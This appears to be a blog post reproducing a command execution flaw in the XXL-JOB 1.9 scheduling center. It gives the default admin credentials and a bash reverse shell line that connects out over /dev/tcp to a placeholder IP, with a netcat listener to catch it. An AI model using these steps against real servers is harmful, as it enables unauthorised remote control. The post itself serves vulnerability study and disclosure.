当前位置:网站首页>Repetition XXL - JOB scheduling center background arbitrary command execution
Repetition XXL - JOB scheduling center background arbitrary command execution
2022-07-30 04:32:00 【xiaochuhe.】
Warning
Do not use the content mentioned in this article violating the law.
This article no warranties
Table of Contents
Three, vulnerability recurrence
I. VulnerabilityDescription
XXL-JOB Task Scheduling Center Attackers can obtain server permissions by writing shell commands for task scheduling in the background.
Second, the affected version
- xxl-job version 1.9 system
III. Vulnerability recurrence
1. The default password is admin/123456, and a task will be added to the login background
2. Click GLUE IDE to edit the script and enter the following commands:
#!/bin/bashbash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/6666 <&1'
3.vps nc starts monitoring:
4. Click to execute, bounce the shell
边栏推荐
- QT(39)-vs开发qt程序提示无法打开源文件
- 复现XXL-JOB 任务调度中心后台任意命令执行漏洞
- - B + tree index and MySQL series 】 【 what is the difference between a HASH index
- Boss Rush (二分答案 + 状压DP)
- Usage of exists in sql
- 图像视角矫正之透视变换矩阵(单应矩阵)/findHomography 与 getPerspectiveTransformd的区别
- Chapter8 支持向量机
- Building and sharing the root of the digital world: Alibaba Cloud builds a comprehensive cloud-native open source ecosystem
- KubeMeet 报名 | 「边缘原生」线上技术沙龙完整议程公布!
- MySQL data query (subtotal and sorting)
猜你喜欢
![[SQL] at a certain correlation with a table of data update another table](/img/66/4dff4383509e5d25890d8a24720de6.png)
[SQL] at a certain correlation with a table of data update another table
Chapter8 Support Vector Machines
Shell脚本基本编辑规范及变量
验证addShutdownHook钩子生效
Chapter8 支持向量机
Install MySQL Database on Kylin V10 Operating System
swagger使用教程——快速使用swagger
Arrays and Structures
GCC Rust获批将被纳入主线代码库,或将于GCC 13中与大家见面
![[MRCTF2020]Hello_misc](/img/ea/0faacf6e544b60e3459d8ace4d5f42.png)
[MRCTF2020]Hello_misc
随机推荐
Data Lake: Data Integration Tool DataX
C. Travelling Salesman and Special Numbers (二进制 + 组合数)
Database Design of Commodity Management System--SQL Server
golang中如何比较struct,slice,map是否相等以及几种对比方法的区别
数据目录是什么?为何需要它?
js operation to add or subtract from the current date (day, week, month, year)
error: The following untracked working tree files would be overwritten by
Drools (7): WorkBench
[Redis Master Cultivation Road] Jedis - the basic use of Jedis
MySql 怎么查出符合条件的最新的数据行?
SQL introduction of the first lecture -- MySQL 8.0.29 installation tutorial (Windows 64 - bit)
【Redis高手修炼之路】Jedis——Jedis的基本使用
js 操作在当前日期加减(天、周、月、年数)
[Awards every week] The "Edge Containers" track of the Cloud Native Programming Challenge invites you to fight!
Go 学习笔记(84)— Go 项目目录结构
数据库概论 - MySQL的简单介绍
labelme的使用技巧
Discourse Custom Header Links
[Linear table] - Detailed explanation of three practice questions of LeetCode
1. 获取数据-requests.get()